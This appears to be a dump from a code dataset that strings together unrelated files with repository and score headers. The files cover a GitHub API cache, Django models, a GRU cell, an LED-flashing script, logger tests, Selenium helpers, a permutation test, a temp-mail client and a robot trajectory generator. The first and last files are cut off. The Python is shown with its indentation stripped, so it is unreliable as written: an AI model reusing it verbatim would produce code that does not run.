assert path == "year_2000/month_09/day_19/2000/2000-09-19/", path
if __name__ == "__main__":
test_blob_paths_split_filename()
test_blob_paths_get_paths()
test_blob_paths_builder()
print('okay')
| 2.71875 | 3 |
github.py | utsengar/GitMetrics | 0 | 12767421 | <gh_stars>0
import heapq
import calendar
import requests
from app import cache, GITHUB_BASE, GITHUB_API_TOKEN, CACHE_TTL
from datetime import datetime
from flask import Response
headers = {"Accept": "application/vnd.github.v3+json", "Authorization" : "token " + GITHUB_API_TOKEN}
def get_from_cache(resource):
data = cache.get("data+" + resource)
headers = cache.get("headers+" + resource)
status = cache.get("status+" + resource)
return (data, status, headers)
def get(resource):
try:
resp = requests.get("{0}{1}".format(GITHUB_BASE, resource), headers=headers)
result = []
if resp.status_code == 200:
result = resp.json()
while resp.links.has_key("next"):
next_link = resp.links['next']
resp = requests.get(next_link["url"], headers=headers)
result.extend(resp.json())
r = result
else:
r = None
except requests.exceptions.ConnectionError:
r = {"message": "Connection refused"}
except ValueError:
r = resp.text
cached_resources = cache.get("resources_to_cache")
if resource not in cached_resources:
cached_resources.append(resource)
cache.set("data+"+resource, r, timeout=CACHE_TTL)
cache.set("headers+"+resource, resp.headers.get("content-type"), timeout=CACHE_TTL)
cache.set("status+"+resource, resp.status_code, timeout=CACHE_TTL)
cache.set("resources_to_cache", cached_resources, timeout=CACHE_TTL)
return (r, resp.status_code, resp.headers.get("content-type"))
def compute(path, n, topic):
h_forks = []
h_last_updated = []
h_open_issues = []
h_stars = []
h_watchers = []
repo_data = cache.get("data+/orgs/bitcoin/repos")
if not repo_data:
repo_data = get("/orgs/bitcoin/repos")[0]
for repo in repo_data:
if topic == "forks":
heapq.heappush(h_forks, (repo["forks"], [repo['full_name'], repo["forks"]]))
elif topic == "last_updated":
heapq.heappush(h_last_updated, (iso8601_to_epoch(repo["updated_at"]), [repo['full_name'], repo["updated_at"]]))
elif topic == "open_issues":
heapq.heappush(h_open_issues, (repo["open_issues_count"], [repo['full_name'], repo["open_issues_count"]]))
elif topic == "stars":
heapq.heappush(h_stars, (repo["stargazers_count"], [repo['full_name'], repo["stargazers_count"]]))
elif topic == "watchers":
heapq.heappush(h_watchers, (repo["watchers"], [repo['full_name'], repo["watchers"]]))
if topic == "forks":
largest = heapq.nlargest(n, h_forks)
elif topic == "last_updated":
largest = heapq.nlargest(n, h_last_updated)
elif topic == "open_issues":
largest = heapq.nlargest(n, h_open_issues)
elif topic == "stars":
largest = heapq.nlargest(n, h_stars)
elif topic == "watchers":
largest = heapq.nlargest(n, h_watchers)
largest = [x[1] for x in largest]
cache.set("data+"+path, largest, timeout=CACHE_TTL)
return (largest, 200, {})
def iso8601_to_epoch(datestring):
return calendar.timegm(datetime.strptime(datestring, "%Y-%m-%dT%H:%M:%SZ").timetuple())
| 2.453125 | 2 |
bridger/markdown/models.py | intellineers/django-bridger | 2 | 12767422 | <gh_stars>1-10
import pathlib
import uuid
from django.db import models
from django.dispatch import receiver
class Asset(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
file = models.FileField(upload_to="markdown/assets")
content_type = models.CharField(max_length=10, null=True, blank=True)
file_url_name = models.CharField(max_length=1024, null=True, blank=True)
# public = models.BooleanField(default=True)
class Meta:
verbose_name = "Asset"
verbose_name_plural = "Assets"
@receiver(models.signals.pre_save, sender="bridger.Asset")
def generate_content_type(sender, instance, **kwargs):
if suffix := pathlib.Path(instance.file.name).suffix:
instance.content_type = suffix[1:]
instance.file_url_name = f"{instance.id}{suffix}"
| 2.21875 | 2 |
rnns/gru.py | anoidgit/zero | 111 | 12767423 | # coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from func import linear
from rnns import cell as cell
class gru(cell.Cell):
"""The Gated Recurrent Unit."""
def __init__(self, d, ln=False, scope='gru'):
super(gru, self).__init__(d, ln=ln, scope=scope)
def get_init_state(self, shape=None, x=None, scope=None):
return self._get_init_state(
self.d, shape=shape, x=x, scope=scope)
def fetch_states(self, x):
with tf.variable_scope(
"fetch_state_{}".format(self.scope or "gru")):
g = linear(x, self.d * 2,
bias=False, ln=self.ln, scope="gate_x")
h = linear(x, self.d,
bias=False, ln=self.ln, scope="hide_x")
return g, h
def __call__(self, h_, x):
# h_: the previous hidden state
# x_g/x: the current input state for gate
# x_h/x: the current input state for hidden
"""
z = sigmoid(h_, x)
r = sigmoid(h_, x)
h' = tanh(x, r * h_)
h = z * h_ + (1. - z) * h'
"""
with tf.variable_scope(
"cell_{}".format(self.scope or "gru")):
x_g, x_h = x
h_g = linear(h_, self.d * 2,
ln=self.ln, scope="gate_h")
z, r = tf.split(
tf.sigmoid(x_g + h_g), 2, -1)
h_h = linear(h_ * r, self.d,
ln=self.ln, scope="hide_h")
h = tf.tanh(x_h + h_h)
h = z * h_ + (1. - z) * h
return h
| 2.984375 | 3 |
biostar/apps/planet/models.py | Torres63/biostar | 1 | 12767424 | from django.db import models
from django.conf import settings
import os, urllib, logging, feedparser, datetime
from django.core.urlresolvers import reverse
from django.utils.timezone import utc
from django.contrib import admin
logger = logging.getLogger(__name__)
def now():
return datetime.datetime.utcnow().replace(tzinfo=utc)
def abspath(*args):
"""Generates absolute paths"""
return os.path.abspath(os.path.join(*args))
# Create your models here.
class Blog(models.Model):
"Represents a blog"
title = models.CharField(verbose_name='Blog Name', max_length=255, default="", blank=False)
desc = models.TextField(default='', blank=True)
feed = models.URLField()
link = models.URLField()
active = models.BooleanField(default=True)
list_order = models.IntegerField(default=0)
@property
def fname(self):
fname = abspath(settings.PLANET_DIR, '%s.xml' % self.id)
return fname
def parse(self):
try:
doc = feedparser.parse(self.fname)
except Exception, exc:
logger.error("error %s parsing blog %s", (exc, self.id))
doc = None
return doc
def download(self):
try:
text = urllib.urlopen(self.feed).read()
stream = file(self.fname, 'wt')
stream.write(text)
stream.close()
except Exception, exc:
logger.error("error %s downloading %s", (exc, self.feed))
def __unicode__(self):
return self.title
class BlogPost(models.Model):
"Represents an entry of a Blog"
# The blog that generated the entry
blog = models.ForeignKey(Blog)
# A unique id for this entry
uid = models.CharField(max_length=200, default="", null=False)
# The title of the entry
title = models.CharField(max_length=200, null=False)
# The content of the feed
content = models.TextField(default='', max_length=20000)
# Santizied HTML
html = models.TextField(default='')
# Date related fields.
creation_date = models.DateTimeField(db_index=True)
# Date at which the post has been inserted into the database
insert_date = models.DateTimeField(db_index=True, null=True)
# Has the entry been published
published = models.BooleanField(default=False)
# The link to the entry
link = models.URLField()
@property
def get_title(self):
return u"BLOG: %s" % self.title
def get_absolute_url(self):
return self.link
def save(self, *args, **kwargs):
if not self.id:
# Set the date to current time if missing.
self.insert_date = self.insert_date or now()
super(BlogPost, self).save(*args, **kwargs)
def __unicode__(self):
return self.title
admin.site.register(Blog) | 2.25 | 2 |
05-TCP-IP/shelly/shelly_red_flash.py | outsmartit/raspberry-pi-home-automation | 30 | 12767425 | <filename>05-TCP-IP/shelly/shelly_red_flash.py
"""Let a Shelly RGBW2 LED controller flash the LEDs red.
Copyright (C) 2020 <NAME>
License: MIT
"""
import time
import requests
# Define URLs for the Shelly HTTP API
IP = "http://192.168.0.202"
SHELLY = IP + "/shelly"
COLOR = IP + "/color/0/"
DISABLE_EFFECTS = "effect=0"
ONLY_RED = "red=255&green=0&blue=0&white=0"
ON = "turn=on"
OFF = "turn=off"
AUTH = ("admin", "admin")
HEADER = {"Content-Type": "application/x-www-form-urlencoded"}
try:
shelly = requests.get(SHELLY)
if shelly.status_code == 200:
shelly_json = shelly.json()
shelly_type = shelly_json["type"]
shelly_mac = shelly_json["mac"]
print(
"Connected to device {} with MAC address {}.".format(
shelly_type, shelly_mac
)
)
# Disable effects and show only red
disable_effects = requests.post(
COLOR, auth=AUTH, headers=HEADER, data=DISABLE_EFFECTS
)
only_red = requests.post(COLOR, auth=AUTH, headers=HEADER, data=ONLY_RED)
while True:
on = requests.post(COLOR, auth=AUTH, headers=HEADER, data=ON)
time.sleep(1)
off = requests.post(COLOR, auth=AUTH, headers=HEADER, data=OFF)
time.sleep(1)
except requests.exceptions.ConnectionError as e:
print("Can't connect to device {}: {}".format(IP, e))
| 3.234375 | 3 |
tests/test_remeha.py | TheRikke/remeha_tz | 7 | 12767426 | import json
import os
import tempfile
from unittest import mock
from remeha import read_config, FileLogger
from remeha_core import Frame
from tests.test_base import TestBase
class TestRemeha(TestBase):
raw_test_data = bytearray([0x02, 0x01, 0xfe, 0x06, 0x48, 0x02, 0x01, 0xa2,
0x12, 0x00, 0x0a, 0x80, 0xf3, 0xc2, 0x01, 0xfc,
0x12, 0x00, 0x80, 0x9c, 0x0e, 0xd1, 0x06, 0x8e,
0x12, 0x88, 0x13, 0x98, 0x08, 0x68, 0x09, 0x6a,
0x09, 0x3a, 0x8e, 0x12, 0x47, 0x45, 0x00, 0x64,
0x47, 0x00, 0x00, 0x13, 0xc6, 0x40, 0x05, 0x03,
0xff, 0xff, 0x1e, 0x30, 0x0f, 0x04, 0xff, 0xff,
0x00, 0xc0, 0x4e, 0x12, 0x00, 0x00, 0x00, 0x00,
0x80, 0x47, 0x03, 0x40, 0x35, 0x00, 0x00, 0x17,
0xef, 0x03])
def setUp(self):
self.test_config_directory = tempfile.TemporaryDirectory()
def tearDown(self):
self.test_config_directory.cleanup()
def test_read_config(self):
test_config_path = os.path.join(self.test_config_directory.name, 'test_config.json')
test_config = open(test_config_path, mode='w+')
with mock.patch.dict('os.environ', {'REMEHA_CONF': test_config.name}):
test_config.write('{ "database_logger": { "host": "testserver.local", "user_name": "database_user", "password": "<PASSWORD>" } }')
test_config.close()
config = read_config()
assert 'database_logger' in config
def test_read_config_does_not_crash_on_unreadable_config(self):
test_config_path = os.path.join(self.test_config_directory.name, 'test_config.json')
test_config = open(test_config_path, mode='w+')
with mock.patch.dict('os.environ', {'REMEHA_CONF': test_config.name}):
test_config.write('{ "database_logger": { "host": "testserver.local", "user_name": "database_user", "password": "<PASSWORD>" } ')
test_config.close()
config = read_config()
assert config is None
def test_read_default_config_if_REMEHA_CONF_not_set(self):
with mock.patch.dict('os.environ', clear=True):
config = read_config()
assert config is not None
def test_filelogger_does_nothing_if_configured_off(self):
with mock.patch('remeha.csv') as csv_mock:
file_logger = FileLogger(None, None)
file_logger.log_data(self.raw_test_data)
csv_mock.writer.assert_not_called()
def test_filelogger_uses_filename_if_provided(self):
with mock.patch('remeha.csv') as csv_mock:
with tempfile.TemporaryDirectory() as temp_dir:
file_name = temp_dir + '/test.csv'
file_logger = FileLogger(None, file_name)
file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
file_logger.close()
assert os.path.exists(file_name)
csv_mock.writer.assert_called()
def test_filelogger_uses_config_path_if_provided(self):
with tempfile.TemporaryDirectory() as temp_dir:
file_name = temp_dir + '/test.csv'
file_logger = FileLogger(json.loads('{"enabled": true, "path": "%s"}' % file_name), None)
file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
file_logger.close()
assert os.path.exists(file_name)
def test_filelogger_no_file_logging_if_disabled_in_config(self):
with tempfile.TemporaryDirectory() as temp_dir:
file_name = temp_dir + '/test.csv'
file_logger = FileLogger(json.loads('{"enabled": false, "path": "%s"}' % file_name), None)
file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
file_logger.close()
assert not os.path.exists(file_name)
def test_filelogger_commandline_parameter_overwrites_config_path(self):
with tempfile.TemporaryDirectory() as temp_dir:
expected_file_name = temp_dir + '/test.csv'
not_expected_file_name = temp_dir + '/test2.csv'
file_logger = FileLogger(json.loads('{"enabled": true, "path": "%s"}' % not_expected_file_name), expected_file_name)
file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
file_logger.close()
assert not os.path.exists(not_expected_file_name)
assert os.path.exists(expected_file_name)
| 2.21875 | 2 |
common/_webdriver_qa_api/core/selenium_dynamic_elements.py | albalabkin/PyCats | 0 | 12767427 | <reponame>albalabkin/PyCats<filename>common/_webdriver_qa_api/core/selenium_dynamic_elements.py
import logging
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
logger = logging.getLogger(__name__)
class DynamicElement:
def __init__(self, locator_type, locator, driver, name=None, parent=None):
self.__driver = driver
self.__locator_type = locator_type
self.__locator = locator
self.__name = locator if name is None else name
self.__parent = parent
@property
def name(self):
return self.__name
@property
def selenium_element(self):
if self.__parent is None:
try:
logger.info(f"Looking for element {self.__locator}")
return self.__driver.find_element(self.__locator_type, self.__locator)
except NoSuchElementException:
logger.exception("An element '{0}' {1}could not be located on the page.".format(
self.__name, "" if self.__locator == self.__name else "with locator '{}' ".format(self.__locator)))
else:
try:
return self.__parent().find_element(self.__locator_type, self.__locator)
except NoSuchElementException:
logger.exception("An element '{0}' {1}for __parent '{2}' could not be located on the page.".format(
self.__name, "" if self.__locator == self.__name else "with locator '{}' ".format(self.__locator),
self.__parent.name))
def __log(self, item, attribute):
name = object.__getattribute__(self, "name")
if callable(attribute):
logger.info(f"Call method {item} in element {name}")
else:
logger.info(f"get attribute {item} in element {name}")
def __call__(self):
return self.selenium_element
def __getattribute__(self, item):
attribute = object.__getattribute__(self, item)
if "_DynamicElement__" not in item:
object.__getattribute__(self, "_DynamicElement__log")(
item, attribute)
logger.info(f"attribute getattribute {attribute} {item}")
return attribute
def __getattr__(self, item):
try:
attribute = getattr(self.selenium_element, item)
except StaleElementReferenceException:
attribute = getattr(self.selenium_element, item)
object.__getattribute__(self, "_DynamicElement__log")(item, attribute)
logger.info(f"attribute getattr {attribute}")
return attribute
class DynamicElements(DynamicElement):
def __init__(self, locator_type, locator, driver, name=None,
parent=None):
self.parent = parent
self.driver = driver
self.locator_type = locator_type
self.locator = locator
super().__init__(locator_type, locator, driver, name=name,
parent=parent)
@property
def selenium_element(self):
if self.parent is None:
return self.driver.find_elements(self.locator_type, self.locator)
else:
return self.parent().find_elements(self.locator_type, self.locator)
| 2.53125 | 3 |
apps/vim/plugins/ultisnips/python_snippets.py | codecat555/codecat555-fidgetingbits_knausj_talon | 1 | 12767428 | from talon import Context
ctx = Context()
ctx.matches = r"""
tag: user.vim_ultisnips
mode: user.python
mode: command
and code.language: python
"""
# spoken name -> snippet name
ultisnips_snippets = {
"header": "#!",
"if main": "ifmain",
"for loop": "for",
"class": "class",
"function": "def",
"method": "deff",
"class method": "defc",
"static method": "defs",
"from": "from",
"if": "if",
"if else": "ife",
"if if else": "ifee",
"try": "try",
"try except": "trye",
"finally": "tryf",
"trip string": '"',
"trip tick": "'",
}
private_snippets = {
"print success": "psuccess",
"print fail": "pfail",
"dick string": "dstr",
"dick format string": "dfstr",
"new arg parser": "argparse",
"add argument": "narg",
"dock param": "dockparam",
}
ctx.lists["user.snippets"] = {**ultisnips_snippets, **private_snippets}
| 2.3125 | 2 |
analysis_layer/test_permutation.py | tpimentelms/phonotactic-complexity | 5 | 12767429 | <reponame>tpimentelms/phonotactic-complexity
import numpy as np
def paired_permutation_test(art, norm, verbose=True):
diffs = [art[i] - norm[i] for i in range(len(art))]
mu = np.abs(np.mean(diffs))
n = 0
for i in range(2**len(art)):
permut = bin(i)[2:]
permut = [0] * (len(art) - len(permut)) + [int(y) for y in permut]
mu_new = np.abs(np.mean([x if j else -x for x, j in zip(diffs, permut)]))
if mu_new >= mu:
n += 1
if verbose:
print(diffs)
print(n, n / 2**len(art))
return n / 2**len(art)
def paired_permutation_test_partial(art, norm, ntests=10000, verbose=True):
diffs = [art[i] - norm[i] for i in range(len(art))]
mu = np.abs(np.mean(diffs))
n = 0
for _ in range(ntests):
permut = np.random.uniform(0, 1, size=(len(art))) > 0.5
permut = [0] * (len(art) - len(permut)) + [int(y) for y in permut]
mu_new = np.abs(np.mean([x if j else -x for x, j in zip(diffs, permut)]))
if mu_new >= mu:
n += 1
if verbose:
print(n, n / ntests)
return n / ntests
| 3.140625 | 3 |
DisMail/api/secmail/account.py | heisid/DisMail | 8 | 12767430 | from .classes import Inbox, Stash
from .inbox import get_inbox, read_mail
class SecmailAccount(object):
def __init__(self, email):
self.pagination = 0
self.email = email
self.login, self.domain = email.split('@')
self.inbox = list()
def refresh(self):
inbox = get_inbox(self.login, self.domain)
stashes = list()
for i, mail in enumerate(inbox, start=1):
newStash = Stash(
mail["id"], mail["from"],
mail["subject"], mail["date"]
)
newStash.position = i
stashes.append(newStash)
self.inbox = Inbox(stashes)
def get_max_page(self, amount=5):
retval = len(self.inbox.stashes) // amount
if len(self.inbox.stashes) % amount != 0:
retval += 1
return retval
def get_inbox(self, pagination=None, amount=5):
if pagination is not None:
self.pagination = pagination
# Clamp value
self.pagination = max(min(self.pagination, self.get_max_page()-1), 0)
start = self.pagination * amount
end = start + amount
return self.inbox[start:end]
def get_mail(self, index):
index = abs(index)
if index >= len(self.inbox.stashes):
index = len(self.inbox.stashes) - 1
return read_mail(self.login, self.domain, self.inbox[index].id)
def test(self):
from datetime import datetime
print("Get By Id")
print(self.inbox.get_by_id(self.inbox[0].id))
print("Get by sender")
print(self.inbox.filter_by_sender(self.inbox[0].sender))
print("Get by subject")
print(self.inbox.filter_by_subject(self.inbox[0].subject))
print("Get by word in subject")
print(self.inbox.filter_by_word_in_subject(self.inbox[0].subject.split(' ')[0]))
start = self.inbox[0].date
end = datetime.max
print(self.inbox.filter_by_date(start, end))
| 2.578125 | 3 |
src/adherent/trajectory_generation/trajectory_generator.py | ami-iit/paper_viceconte_2021_ral_adherent | 6 | 12767431 | <gh_stars>1-10
# SPDX-FileCopyrightText: <NAME> Italiano di Tecnologia
# SPDX-License-Identifier: BSD-3-Clause
# Use tf version 2.3.0 as 1.x
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import os
import math
import json
import yarp
import numpy as np
from typing import List, Dict
from scenario import gazebo as scenario
from dataclasses import dataclass, field
from gym_ignition.rbd.idyntree import numpy
from gym_ignition.rbd.conversions import Rotation
from gym_ignition.rbd.conversions import Transform
from adherent.MANN.utils import denormalize
from gym_ignition.rbd.conversions import Quaternion
from adherent.MANN.utils import read_from_file
from adherent.data_processing.utils import iCub
from gym_ignition.rbd.idyntree import kindyncomputations
from adherent.data_processing.utils import rotation_2D
from adherent.trajectory_generation.utils import trajectory_blending
from adherent.trajectory_generation.utils import load_output_mean_and_std
from adherent.trajectory_generation.utils import compute_angle_wrt_x_positive_semiaxis
from adherent.trajectory_generation.utils import load_component_wise_input_mean_and_std
import matplotlib as mpl
mpl.rcParams['toolbar'] = 'None'
import matplotlib.pyplot as plt
@dataclass
class StorageHandler:
"""Class to store all the quantities relevant in the trajectory generation pipeline and save data."""
# Storage paths for the footsteps, postural, joystick input and blending coefficients
footsteps_path: str
postural_path: str
joystick_input_path: str
blending_coefficients_path: str
# Storage dictionaries for footsteps, postural, joystick input and blending coefficients
footsteps: Dict = field(default_factory=lambda: {'l_foot': [], 'r_foot': []})
posturals: Dict = field(default_factory=lambda: {'base': [], 'joints': [], 'links': [], 'com': []})
joystick_inputs: Dict = field(default_factory=lambda: {'raw_data': [], 'quad_bezier': [], 'base_velocities': [], 'facing_dirs': []})
blending_coeffs: Dict = field(default_factory=lambda: {'w_1': [], 'w_2': [], 'w_3': [], 'w_4': []})
@staticmethod
def build(storage_path: str) -> "StorageHandler":
"""Build an instance of StorageHandler."""
# Storage paths for the footsteps, postural, joystick input and blending coefficients
footsteps_path = os.path.join(storage_path, "footsteps.txt")
postural_path = os.path.join(storage_path, "postural.txt")
joystick_input_path = os.path.join(storage_path, "joystick_input.txt")
blending_coefficients_path = os.path.join(storage_path, "blending_coefficients.txt")
return StorageHandler(footsteps_path,
postural_path,
joystick_input_path,
blending_coefficients_path)
def update_joystick_inputs_storage(self, raw_data: List, quad_bezier: List, base_velocities: List, facing_dirs: List) -> None:
"""Update the storage of the joystick inputs."""
self.joystick_inputs["raw_data"].append(raw_data)
self.joystick_inputs["quad_bezier"].append(quad_bezier)
self.joystick_inputs["base_velocities"].append(base_velocities)
self.joystick_inputs["facing_dirs"].append(facing_dirs)
def update_blending_coefficients_storage(self, blending_coefficients: List) -> None:
"""Update the storage of the blending coefficients."""
self.blending_coeffs["w_1"].append(float(blending_coefficients[0][0]))
self.blending_coeffs["w_2"].append(float(blending_coefficients[0][1]))
self.blending_coeffs["w_3"].append(float(blending_coefficients[0][2]))
self.blending_coeffs["w_4"].append(float(blending_coefficients[0][3]))
def update_footsteps_storage(self, support_foot: str, footstep: Dict) -> None:
"""Add a footstep to the footsteps storage."""
self.footsteps[support_foot].append(footstep)
def replace_footsteps_storage(self, footsteps: Dict) -> None:
"""Replace the storage of footsteps with an updated footsteps list."""
self.footsteps = footsteps
def update_posturals_storage(self, base: Dict, joints: Dict, links: Dict, com: List) -> None:
"""Update the storage of the posturals."""
self.posturals["base"].append(base)
self.posturals["joints"].append(joints)
self.posturals["links"].append(links)
self.posturals["com"].append(com)
def save_data_as_json(self) -> None:
"""Save all the stored data using the json format."""
# Save footsteps
with open(self.footsteps_path, 'w') as outfile:
json.dump(self.footsteps, outfile)
# Save postural
with open(self.postural_path, 'w') as outfile:
json.dump(self.posturals, outfile)
# Save joystick inputs
with open(self.joystick_input_path, 'w') as outfile:
json.dump(self.joystick_inputs, outfile)
# Save blending coefficients
with open(self.blending_coefficients_path, 'w') as outfile:
json.dump(self.blending_coeffs, outfile)
# Debug
input("\nData have been saved. Press Enter to continue the trajectory generation.")
@dataclass
class FootstepsExtractor:
"""Class to extract the footsteps from the generated trajectory."""
# Auxiliary variables for the footsteps update before saving
nominal_DS_duration: float
difference_position_threshold: float
# Auxiliary variables to handle the footsteps deactivation time
difference_height_norm_threshold: bool
waiting_for_deactivation_time: bool = False
@staticmethod
def build(nominal_DS_duration: float = 0.04,
difference_position_threshold: float = 0.04,
difference_height_norm_threshold: bool = 0.005) -> "FootstepsExtractor":
"""Build an instance of FootstepsExtractor."""
return FootstepsExtractor(nominal_DS_duration=nominal_DS_duration,
difference_position_threshold=difference_position_threshold,
difference_height_norm_threshold=difference_height_norm_threshold)
def should_update_footstep_deactivation_time(self, kindyn: kindyncomputations.KinDynComputations) -> bool:
"""Check whether the deactivation time of the last footstep needs to be updated."""
# Retrieve the transformation from the world frame to the base frame
world_H_base = kindyn.get_world_base_transform()
# Compute right foot height
base_H_r_foot = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="r_foot")
W_H_RF = world_H_base.dot(base_H_r_foot)
W_right_foot_pos = W_H_RF [0:3, -1]
right_foot_height = W_right_foot_pos[2]
# Compute left foot height
base_H_l_foot = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="l_foot")
W_H_LF = world_H_base.dot(base_H_l_foot)
W_left_foot_pos = W_H_LF[0:3, -1]
left_foot_height = W_left_foot_pos[2]
# Compute the difference in height between the feet
difference_height_norm = np.linalg.norm(left_foot_height - right_foot_height)
# If the height difference is above a threshold and a foot is being detached, the deactivation
# time of the last footstep related to the detaching foot needs to be updated
if self.waiting_for_deactivation_time and difference_height_norm > self.difference_height_norm_threshold:
self.waiting_for_deactivation_time = False
return True
return False
def create_new_footstep(self, kindyn: kindyncomputations.KinDynComputations,
support_foot: str, activation_time: float) -> Dict:
"""Retrieve the information related to a new footstep."""
new_footstep = {}
# Compute new footstep 3D and 2D position
world_H_base = kindyn.get_world_base_transform()
base_H_support_foot = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=support_foot)
W_H_SF = world_H_base.dot(base_H_support_foot)
support_foot_pos = W_H_SF[0:3, -1]
support_foot_ground_pos = [support_foot_pos[0], support_foot_pos[1]]
new_footstep["3D_pos"] = list(support_foot_pos)
new_footstep["2D_pos"] = support_foot_ground_pos
# Compute new footstep 3D and 2D orientation
support_foot_quat = Quaternion.from_matrix(W_H_SF[0:3, 0:3])
W_R_SF = Rotation.from_quat(Quaternion.to_xyzw(np.asarray(support_foot_quat)))
W_RPY_SF = Rotation.as_euler(W_R_SF, 'xyz')
new_footstep["3D_orient"] = W_R_SF.as_matrix().tolist()
new_footstep["2D_orient"] = W_RPY_SF[2]
# Assign new footstep activation time
new_footstep["activation_time"] = activation_time
# Use a temporary flag indicating that the deactivation time has not been computed yet
new_footstep["deactivation_time"] = -1
# Set the flag indicating that the last footstep has no deactivation time yet accordingly
self.waiting_for_deactivation_time = True
return new_footstep
def update_footsteps(self, final_deactivation_time: float, footsteps: Dict) -> Dict:
"""Update the footsteps list before saving data by replacing temporary deactivation times (if any) and
merging footsteps which are too close each other in order to avoid unintended footsteps on the spot.
"""
# Update the deactivation time of the last footstep of each foot (they need to coincide to be processed
# properly in the trajectory control layer)
for foot in footsteps.keys():
footsteps[foot][-1]["deactivation_time"] = final_deactivation_time
# Replace temporary deactivation times in the footsteps list (if any)
updated_footsteps = self.replace_temporary_deactivation_times(footsteps=footsteps)
# Merge footsteps which are too close each other
updated_footsteps = self.merge_close_footsteps(final_deactivation_time=final_deactivation_time,
footsteps=updated_footsteps)
return updated_footsteps
def replace_temporary_deactivation_times(self, footsteps: Dict) -> Dict:
"""Replace temporary footstep deactivation times that may not have been updated properly."""
# Map from one foot to the other
other_foot = {"l_foot": "r_foot", "r_foot": "l_foot"}
for foot in ["l_foot","r_foot"]:
for footstep in footsteps[foot]:
# If a temporary footstep deactivation time is detected
if footstep["deactivation_time"] == -1:
# Retrieve the footstep activation time
current_activation_time = footstep["activation_time"]
for footstep_other_foot in footsteps[other_foot[foot]]:
# Retrieve the activation time of the next footstep of the other foot
other_foot_activation_time = footstep_other_foot["activation_time"]
if other_foot_activation_time > current_activation_time:
# Update the deactivation time so to have a double support (DS) phase of the nominal duration
current_deactivation_time = other_foot_activation_time + self.nominal_DS_duration
footstep["deactivation_time"] = current_deactivation_time
break
return footsteps
def merge_close_footsteps(self, final_deactivation_time: float, footsteps: Dict) -> Dict:
"""Merge footsteps that are too close each other in order to avoid unintended footsteps on the spot."""
# Initialize updated footsteps list
updated_footsteps = {"l_foot": [], "r_foot": []}
for foot in footsteps.keys():
# Auxiliary variable to handle footsteps update
skip_next_contact = False
for i in range(len(footsteps[foot]) - 1):
if skip_next_contact:
skip_next_contact = False
continue
# Compute the norm of the difference in position between consecutive footsteps of the same foot
current_footstep_position = np.array(footsteps[foot][i]["2D_pos"])
next_footstep_position = np.array(footsteps[foot][i + 1]["2D_pos"])
difference_position = np.linalg.norm(current_footstep_position - next_footstep_position)
if difference_position >= self.difference_position_threshold:
# Do not update footsteps which are not enough close each other
updated_footsteps[foot].append(footsteps[foot][i])
else:
# Merge footsteps which are close each other: the duration of the current footstep is extended
# till the end of the subsequent footstep
updated_footstep = footsteps[foot][i]
updated_footstep["deactivation_time"] = footsteps[foot][i + 1]["deactivation_time"]
updated_footsteps[foot].append(updated_footstep)
skip_next_contact = True
# If the last updated footstep ends before the final deactivation time, add the last original footstep
# to the updated list of footsteps
if updated_footsteps[foot][-1]["deactivation_time"] != final_deactivation_time:
updated_footsteps[foot].append(footsteps[foot][-1])
return updated_footsteps
@dataclass
class PosturalExtractor:
"""Class to extract the postural from the generated trajectory."""
@staticmethod
def build() -> "PosturalExtractor":
"""Build an instance of PosturalExtractor."""
return PosturalExtractor()
@staticmethod
def create_new_posturals(base_position: List, base_quaternion: List, joint_positions: List, controlled_joints: List,
kindyn: kindyncomputations.KinDynComputations, link_names: List) -> (List, List, List, List):
"""Retrieve the information related to a new set of postural terms."""
# Store the postural term related to the base position and orientation
new_base_postural = {"postion": list(base_position), "wxyz_quaternions": list(base_quaternion)}
# Store the postural term related to the joint angles
new_joints_postural = {controlled_joints[k]: joint_positions[k] for k in range(len(controlled_joints))}
# Store the postural term related to the link orientations
new_links_postural = {}
world_H_base = kindyn.get_world_base_transform()
for link_name in link_names:
base_H_link = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=link_name)
world_H_link = world_H_base.dot(base_H_link)
new_links_postural[link_name] = list(Quaternion.from_matrix(world_H_link[0:3, 0:3]))
# Store the postural term related to the com positions
new_com_postural = list(kindyn.get_com_position())
return new_base_postural, new_joints_postural, new_links_postural, new_com_postural
@dataclass
class KinematicComputations:
"""Class for the kinematic computations exploited within the trajectory generation pipeline to compute
kinematically-feasible base motions.
"""
kindyn: kindyncomputations.KinDynComputations
# Footsteps and postural extractors
footsteps_extractor: FootstepsExtractor
postural_extractor: PosturalExtractor
# Simulated robot (for visualization only)
icub: iCub
controlled_joints: List
gazebo: scenario.GazeboSimulator
# Support foot and support vertex related quantities
local_foot_vertices_pos: List
support_vertex_prev: int = 0
support_vertex: int = 0
support_foot_prev: str = "r_foot"
support_foot: str = "r_foot"
support_foot_pos: float = 0
support_vertex_pos: float = 0
support_vertex_offset: float = 0
@staticmethod
def build(kindyn: kindyncomputations.KinDynComputations,
local_foot_vertices_pos: List,
icub: iCub,
gazebo: scenario.GazeboSimulator,
nominal_DS_duration: float = 0.04,
difference_position_threshold: float = 0.04,
difference_height_norm_threshold: bool = 0.005) -> "KinematicComputations":
"""Build an instance of KinematicComputations."""
footsteps_extractor = FootstepsExtractor.build(nominal_DS_duration=nominal_DS_duration,
difference_position_threshold=difference_position_threshold,
difference_height_norm_threshold=difference_height_norm_threshold)
postural_extractor = PosturalExtractor.build()
return KinematicComputations(kindyn=kindyn,
footsteps_extractor=footsteps_extractor,
postural_extractor=postural_extractor,
local_foot_vertices_pos=local_foot_vertices_pos,
icub=icub,
controlled_joints=icub.joint_names(),
gazebo=gazebo)
def compute_W_vertices_pos(self) -> List:
"""Compute the feet vertices positions in the world (W) frame."""
# Retrieve the transformation from the world to the base frame
world_H_base = self.kindyn.get_world_base_transform()
# Retrieve front-left (FL), front-right (FR), back-left (BL) and back-right (BR) vertices in the foot frame
FL_vertex_pos = self.local_foot_vertices_pos[0]
FR_vertex_pos = self.local_foot_vertices_pos[1]
BL_vertex_pos = self.local_foot_vertices_pos[2]
